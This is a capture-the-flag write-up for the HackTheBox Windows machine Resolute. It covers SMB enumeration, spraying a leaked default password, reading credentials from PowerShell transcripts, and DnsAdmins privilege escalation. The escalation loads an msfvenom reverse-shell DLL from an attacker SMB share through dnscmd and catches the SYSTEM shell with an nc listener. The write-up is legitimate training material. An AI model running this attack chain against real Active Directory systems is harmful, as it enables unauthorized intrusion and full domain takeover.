HackTheBox - Resoulte

Summary

Resoulte is an Windows box created by egre55, is an Windows medium difficulty box.Initial foothold was finding the user description from enum4linux response which contained the default password,And trying that with all the user to get a valid user with that credential.Using which we can get a shell (winrm) on the box and get user.txt. Lateral moment required us to find rayan credential in PSTranscripts.Then checking the group we see that rayan is a member of DNSAdmin group using which we can get a root shell on the box.

Enumeration

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-09 09:13 WIT
Stats: 0:03:16 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.11% done; ETC: 09:17 (0:00:00 remaining)
Stats: 0:05:23 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.86% done; ETC: 09:19 (0:00:01 remaining)
Nmap scan report for 10.10.10.169
Host is up (0.41s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-02-09 09:23:05Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=2/9%Time=5E3F4EF7%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 11h48m20s, deviation: 4h37m09s, median: 9h08m18s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2020-02-09T01:25:27-08:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-02-09T09:25:26
|_ start_date: 2020-02-09T04:22:37

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 334.05 seconds

We only see LDAP SMB kerberos related ports open which indicate this might be a windows Domain Controller

Lets run enum4linux to dump what all information we can.

looking at the result we get a list of Users using RID bruteforce

as

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
Administrator
Guest
krbtgt
ryan
marko
sunita
abigail
marcus
sally
fred
angela
felicia
gustavo
ulf
stevie
claire
paulo
steve
annette
annika
per
claude
melanie
zach
simon
naoki

in the response we also see something really interesting as

1
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko	Name: Marko Novak	Desc: Account created. Password set to Welcome123!

which indicate the default password is Welcome123!

trying that credential on marko result in Invalid Credential

1
2
3
evil-winrm -i 10.10.10.169 -u marko -p Welcome123!

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Lets see if any account stil have that default password set

I used metasploit smb-brute to crack the password

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58

[*] 10.10.10.169:445 - 10.10.10.169:445 - Starting SMB login bruteforce
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\:Welcome123!',
[!] 10.10.10.169:445 - No active DB -- Credential data will not be saved!
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\Administrator:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\Administrator:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\Guest:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\Guest:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\krbtgt:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\krbtgt:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\ryan:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\ryan:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\marko:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\marko:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\sunita:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\sunita:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\abigail:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\abigail:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\marcus:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\marcus:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\sally:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\sally:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\fred:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\fred:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\angela:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\angela:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\felicia:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\felicia:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\gustavo:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\gustavo:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\ulf:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\ulf:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\stevie:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\stevie:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\claire:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\claire:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\paulo:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\paulo:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\steve:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\steve:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\annette:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\annette:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\annika:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\annika:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\per:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\per:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\claude:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\claude:Welcome123!',
[+] 10.10.10.169:445 - 10.10.10.169:445 - Success: 'MEGABANK\melanie:Welcome123!'
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\zach:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\zach:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\simon:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\simon:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\naoki:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: 'MEGABANK\naoki:Welcome123!',
[*] 10.10.10.169:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

which gave one user as

1
[+] 10.10.10.169:445      - 10.10.10.169:445 - Success: 'MEGABANK\melanie:Welcome123!'

melanie still have that password used.

User

Using the above credential we can use evil-winrm to get user

1
2
3
4
5
6
7
evil-winrm -u melanie -p  Welcome123! -i 10.10.10.169

Evil-WinRM shell v2.0

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\melanie\Documents>

and we can read user.txt from that.

Privilege Escalation (Rayan)

Checking dir -force on the root Directory we see an interesting folder as PSTranscripts

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
*Evil-WinRM* PS C:\> dir -force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 2/8/2020 8:22 PM 402653184 pagefile.sys

*Evil-WinRM* PS C:\>

checking in that folder we get PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt file and when we take a look at that

we find

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError

which give us the password as

1
ryan:Serv3r4Admin4cc123!

when we try that credential on winrm we can login as ryan and get a shell

Privilege Escalation (Administrator?)

Checking the group of rayn using whoami /groups we see that he is a member of DnsAdmins

1
2
3
4
5
6
7
8
9
10
11
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192

the user ryan is in Dnsadmins group, so we can run commands as Administrator. Looking for DNSAdmins Privilege Escalation i found many articles

so following the article i created a malicious DLL and hosted that using smb

dll creation

1
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.X.X LPORT=4444 --platform=windows -f dll > ~/windows/privesc/plugin.dll

hosting it on SMB

1
python3 smbserver.py -smb2support SHARE ~/windows/privesc/

I started an nc listener on another pane on port 4444

1
nc -nvlp 4444

on the winrm pane

I updated the serverlevelplugindll path using dnscmd command

1
2
3
4
Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd  /config /serverlevelplugindll \\10.10.X.X\SHARE\plugin.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

and restarting the service Using

1
2
sc.exe stop dns
sc.exe start dns

and checking back the nc listener we get a shell as nt authority\system

so we can go and read root.txt

1
2
3
4
5
6
7
8
9
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32> cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>type root.txt
type root.txt
e1d94876XXXXXXXXXXXXXXXXXXXX619c
C:\Users\Administrator\Desktop>

and we have pwned Resoulte 💃

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/resolute/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.